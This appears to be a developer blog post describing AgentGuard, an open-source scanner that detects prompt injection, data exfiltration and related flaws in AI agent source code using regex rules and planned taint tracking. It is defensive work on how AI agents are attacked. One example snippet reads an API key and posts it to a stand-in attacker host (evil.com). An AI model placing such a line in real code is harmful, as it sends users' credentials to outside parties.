Beyond Regex: Building Detection Rules for AI Agent Vulnerabilities


[ARTICLE · art-42735] src=dev.to ↗ pub=2026-06-28T22:45Z topic=ai-safety verified=true sentiment=↑ positive

AgentGuard, an open-source static analysis tool for AI agent vulnerabilities, uses regex-based rules to detect prompt injection and other flaws in source code. Its creator, Dockfix Labs, is developing AST-based semantic analysis to track taint flow and catch subtle patterns like data exfiltration. The tool currently covers 10 vulnerability categories and aims to make AI agent code as auditable as web application code.

2 min read · published Jun 28, 2026

When I started building AgentGuard, the first question was: how do you detect a prompt injection vulnerability in source code?

Unlike traditional vulnerabilities (SQL injection, XSS), prompt injection doesn't have a single signature. It is a pattern: untrusted data flowing into LLM context. The vulnerability lies not in any one function call but in how the prompt data is constructed.

Every SAST tool starts with pattern matching. AgentGuard's first layer is regex-based rules:

import re

# Flags an interpolated f-string assigned to a prompt-like name.
FSTRING_INJECTION = re.compile(
    r'(?:prompt|system|message|instruction)\s*[:=]\s*f["\'].*\{.*\}',
    re.I
)

This catches the most common pattern: f-strings that embed user input directly into LLM prompts. It is blunt but effective. In a scan of 50 open-source agent codebases, this single rule found 127 instances.
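To make the rule concrete, here is a minimal sketch of how a line-by-line scanner might apply it. The `scan_source` helper and the `SAMPLE` snippet are hypothetical names for illustration, not AgentGuard's actual API.

```python
import re

# Same rule as above, repeated so the sketch is self-contained.
FSTRING_INJECTION = re.compile(
    r'(?:prompt|system|message|instruction)\s*[:=]\s*f["\'].*\{.*\}',
    re.I,
)


def scan_source(source: str) -> list[tuple[int, str]]:
    """Return (line_number, stripped_line) for every line the rule matches."""
    findings = []
    for lineno, line in enumerate(source.splitlines(), start=1):
        if FSTRING_INJECTION.search(line):
            findings.append((lineno, line.strip()))
    return findings


# Hypothetical input: only the second line interpolates into a prompt.
SAMPLE = '''\
greeting = "hello"
prompt = f"You are a helper. {user_input}"
system_prompt = "You are a helper."
'''

findings = scan_source(SAMPLE)
for lineno, text in findings:
    print(f"line {lineno}: {text}")
```

Note that the rule cannot tell a user-controlled value from a constant: any interpolated f-string assigned to a prompt-like name is flagged, which is part of what makes it blunt.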

Regex has limits. Consider:

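# Pattern A: direct f-string interpolation
prompt = f"You are a helper. {user_input}"

# Pattern B: template filled in later with .format()
template = "You are a helper. {input}"
prompt = template.format(input=user_data)

# Pattern C: concatenation inside a message list
messages = [{"role": "system", "content": config["system_prompt"] + user_message}]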

Pattern A is trivial to detect. Pattern B requires understanding .format() semantics. Pattern C requires tracking data flow through dictionaries and list construction.
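The gap is easy to confirm by running the f-string rule against each pattern. The sketch below does that line by line; the `PATTERNS` dictionary and `rule_matches` helper are illustrative names only.

```python
import re

# The f-string rule, repeated so the sketch is self-contained.
FSTRING_INJECTION = re.compile(
    r'(?:prompt|system|message|instruction)\s*[:=]\s*f["\'].*\{.*\}',
    re.I,
)

# The three patterns from the text, keyed by label.
PATTERNS = {
    "A": 'prompt = f"You are a helper. {user_input}"',
    "B": 'template = "You are a helper. {input}"\n'
         'prompt = template.format(input=user_data)',
    "C": 'messages = [{"role": "system", '
         '"content": config["system_prompt"] + user_message}]',
}


def rule_matches(code: str) -> bool:
    """True if any single line of the snippet matches the rule."""
    return any(FSTRING_INJECTION.search(line) for line in code.splitlines())


results = {label: rule_matches(code) for label, code in PATTERNS.items()}
print(results)
```

Only Pattern A is flagged. B and C build the same kind of tainted prompt, but nothing on any single line looks like an f-string assigned to a prompt-like name.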

This is where AgentGuard is headed next: AST-based semantic analysis.

The next version of AgentGuard will parse Python and JavaScript ASTs to track taint flow:

Sources: user_input, query, message, request.body

Sinks: openai.chat.completions.create, prompt, messages, system

This is the same approach Semgrep and CodeQL use for traditional vulnerabilities, but specialized for LLM-specific sinks.
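As a rough illustration of the idea, the sketch below uses Python's standard `ast` module to propagate taint through assignments and report sink calls that receive tainted values. It is an assumption about how such a pass could look, not AgentGuard's planned implementation: `TaintVisitor`, `find_tainted_sinks`, and the sample code are hypothetical, and the pass ignores branches, function boundaries, and sanitizers.

```python
import ast

# Source and sink names come from the lists above; the rest is illustrative.
SOURCES = {"user_input", "query", "message", "request.body"}
SINK_CALLS = {"openai.chat.completions.create"}


def dotted_name(node):
    """Return 'a.b.c' for a Name/Attribute chain, or None for anything else."""
    if isinstance(node, ast.Name):
        return node.id
    if isinstance(node, ast.Attribute):
        base = dotted_name(node.value)
        return f"{base}.{node.attr}" if base else None
    return None


def is_tainted(expr, tainted):
    """True if expr contains any name or attribute chain in the tainted set."""
    return any(dotted_name(n) in tainted for n in ast.walk(expr))


class TaintVisitor(ast.NodeVisitor):
    def __init__(self):
        self.tainted = set(SOURCES)
        self.findings = []  # line numbers of sink calls fed by tainted data

    def visit_Assign(self, node):
        self.generic_visit(node)  # inspect calls on the right-hand side first
        if is_tainted(node.value, self.tainted):
            for target in node.targets:
                name = dotted_name(target)
                if name:
                    self.tainted.add(name)  # taint flows to the assigned name

    def visit_Call(self, node):
        if dotted_name(node.func) in SINK_CALLS:
            values = list(node.args) + [kw.value for kw in node.keywords]
            if any(is_tainted(v, self.tainted) for v in values):
                self.findings.append(node.lineno)
        self.generic_visit(node)


def find_tainted_sinks(source):
    visitor = TaintVisitor()
    visitor.visit(ast.parse(source))
    return visitor.findings


# Hypothetical agent code: taint flows user_input -> prompt -> messages -> sink.
SAMPLE = '''\
template = "You are a helper. {input}"
prompt = template.format(input=user_input)
messages = [{"role": "system", "content": prompt}]
openai.chat.completions.create(model="example-model", messages=messages)
openai.chat.completions.create(model="example-model", messages=[{"role": "user", "content": "hi"}])
'''

findings = find_tainted_sinks(SAMPLE)
print(findings)
```

The first sink call is reported because its `messages` argument traces back to `user_input` through `.format()` and a list of dictionaries, which is the kind of flow a single-line regex cannot see. The second call uses only constants and is not reported.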

AgentGuard already does a simple form of correlation for ASI03 (Data Exfiltration):

import os
import requests

api_key = os.environ.get("API_KEY")  # line N: secret access
requests.post("https://evil.com/collect", headers={"Auth": api_key})  # line N+1: network exfiltration

The rule checks if a secret-access pattern appears on line N and a network-exfiltration pattern appears on line N+1. This catches the most dangerous pattern: an agent that reads credentials and sends them externally.
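A minimal sketch of that adjacent-line check follows. The two regexes and the `find_exfiltration` helper are assumptions made for illustration; AgentGuard's actual patterns are not shown in this article.

```python
import re

# Illustrative patterns only: environment reads and common outbound HTTP calls.
SECRET_ACCESS = re.compile(r'os\.environ(?:\.get\(|\[)|os\.getenv\(')
NETWORK_SEND = re.compile(r'requests\.(?:post|put|get)\(|urllib\.request\.urlopen\(')


def find_exfiltration(source: str) -> list[int]:
    """Return 1-based line numbers N where line N reads a secret
    and line N+1 makes a network call."""
    lines = source.splitlines()
    hits = []
    for i in range(len(lines) - 1):
        if SECRET_ACCESS.search(lines[i]) and NETWORK_SEND.search(lines[i + 1]):
            hits.append(i + 1)
    return hits


ADJACENT = '''\
api_key = os.environ.get("API_KEY")
requests.post("https://evil.com/collect", headers={"Auth": api_key})
'''

# The same two statements separated by a blank line.
SPACED = '''\
api_key = os.environ.get("API_KEY")

requests.post("https://evil.com/collect", headers={"Auth": api_key})
'''

adjacent_hits = find_exfiltration(ADJACENT)
spaced_hits = find_exfiltration(SPACED)
print(adjacent_hits, spaced_hits)
```

The second sample shows the limit of a strict N / N+1 check: a single blank line between the two statements is enough to evade it.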

Future versions will extend this to full function-level taint tracking.

AgentGuard currently covers all 10 ASI categories:

ASI	Rule	Detection Method
ASI01	Prompt Injection	Regex (f-string, concat, format)
ASI02	Tool Abuse	Regex (os.system, subprocess, eval)
ASI03	Data Exfiltration	Regex + cross-line correlation
ASI04	Excessive Agency	Regex (auto-execute, no-confirm)
ASI05	Supply Chain	Regex (untrusted pip install, dynamic import)
ASI06	Insecure Output	Regex (raw HTML, eval output)
ASI07	Credential Exposure	Regex (API keys, private keys, passwords)
ASI08	Context Manipulation	Regex (context stuffing, token bombing)
ASI09	Agent Loop Exploitation	Regex (recursive calls, no depth limit)
ASI10	Trust Boundary	Regex (mixed privilege, cross-agent calls)
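One way to organize a table like this in code is a small rule registry that pairs each ASI identifier with its compiled pattern. The sketch below is hypothetical: the `Rule` dataclass and `scan` function are illustrative names, and the ASI02 regex is a guess based on the calls listed in the table, not AgentGuard's real rule.

```python
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class Rule:
    asi_id: str
    name: str
    pattern: re.Pattern


# Two entries only; the ASI02 pattern is an assumption built from the table row.
RULES = [
    Rule(
        "ASI01",
        "Prompt Injection",
        re.compile(
            r'(?:prompt|system|message|instruction)\s*[:=]\s*f["\'].*\{.*\}',
            re.I,
        ),
    ),
    Rule(
        "ASI02",
        "Tool Abuse",
        re.compile(r'\bos\.system\(|\bsubprocess\.\w+\(|\beval\('),
    ),
]


def scan(source: str) -> list[tuple[int, str]]:
    """Return (line_number, asi_id) for every rule match, in line order."""
    findings = []
    for lineno, line in enumerate(source.splitlines(), start=1):
        for rule in RULES:
            if rule.pattern.search(line):
                findings.append((lineno, rule.asi_id))
    return findings


# Hypothetical agent code touching both categories.
SAMPLE = '''\
prompt = f"Summarize: {user_input}"
os.system(tool_command)
result = eval(model_output)
print("done")
'''

findings = scan(SAMPLE)
print(findings)
```

Keeping rules as data makes it straightforward to add a category or to swap a regex for a semantic check later without touching the scanning loop.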

The benchmark suite has 28 samples.

The long-term goal is simple: make AI agent code as auditable as web application code. We have Semgrep for web apps. We need AgentGuard for agent apps.

AgentGuard is MIT-licensed and open source. Install it with: pip install dfx-agentguard


Read original on dev.to → dev.to/dockfixlabs/beyond-regex-building-detecti…
